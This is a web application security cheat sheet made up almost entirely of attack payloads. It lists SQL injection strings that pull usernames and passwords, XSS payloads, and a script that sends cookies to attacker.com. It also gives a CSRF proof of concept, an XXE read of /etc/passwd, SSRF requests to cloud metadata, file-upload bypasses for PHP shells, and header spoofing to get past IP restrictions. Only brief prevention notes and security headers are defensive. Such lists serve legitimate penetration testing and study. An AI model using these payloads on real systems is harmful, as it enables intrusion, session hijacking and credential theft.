Web Application Security
SQL Injection
Detection
' -- single quote error
'' -- double quote (no error = vulnerable)
' OR '1'='1 -- always true
' OR 1=1-- -- comment out rest
" OR "1"="1UNION-Based
' ORDER BY 3-- -- find number of columns
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--Blind (Boolean)
' AND 1=1-- -- true
' AND 1=2-- -- false
' AND SUBSTRING(username,1,1)='a'--Blind (Time-Based)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -- MSSQL
' AND SLEEP(5)-- -- MySQL
' || pg_sleep(5)-- -- PostgreSQLCommon Bypasses
' OR 1=1--
' OR 'x'='x
admin'--
' OR 1=1#
%27 OR %271%27=%271 -- URL encodedCross-Site Scripting (XSS)
Types
- Reflected — payload in request, reflected in response
- Stored — payload saved in DB, shown to all users
- DOM-based — payload executed via client-side JS
Basic Payloads
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
"><script>alert(1)</script>
';alert(1)//Cookie Stealing
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>Filter Bypasses
<ScRiPt>alert(1)</ScRiPt> -- case variation
<script>alert(1)</script> -- unicode escape
<img src=1 onerror=alert(1)> -- HTML entities
<scr<script>ipt>alert(1)</script> -- nested tagsCross-Site Request Forgery (CSRF)
What It Is
Forces a logged-in user to perform unintended actions.
Basic PoC
<form action="https://target.com/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
<input type="submit" value="Click Me">
</form>
<script>document.forms[0].submit()</script>GET-based CSRF
<img src="https://target.com/transfer?amount=1000&to=attacker">Prevention
- CSRF tokens (synchronizer token pattern)
- SameSite cookie attribute
- Custom request headers
- Double submit cookie
Security Headers
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=()Common Vulnerabilities Quick Reference
IDOR (Insecure Direct Object Reference)
/api/user/123/profile → try /api/user/124/profile
/download?file=report_user123.pdf → change to another user's fileOpen Redirect
https://site.com/redirect?url=https://evil.comXXE (XML External Entity)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>SSRF (Server-Side Request Forgery)
https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/
https://site.com/fetch?url=http://localhost:6379/ (Redis)
https://site.com/fetch?url=http://internal-server/adminFile Upload Bypass
shell.php → shell.php.jpg
shell.php → shell.PhP
shell.php → shell.php%00.jpg
Add image magic bytes: FF D8 FF E0 (JPEG)Useful HTTP Headers to Test
X-Forwarded-For: 127.0.0.1 -- bypass IP restrictions
X-Real-IP: 127.0.0.1
X-Original-URL: /admin -- path override
X-Custom-IP-Authorization: 127.0.0.1
Referer: https://trusted.com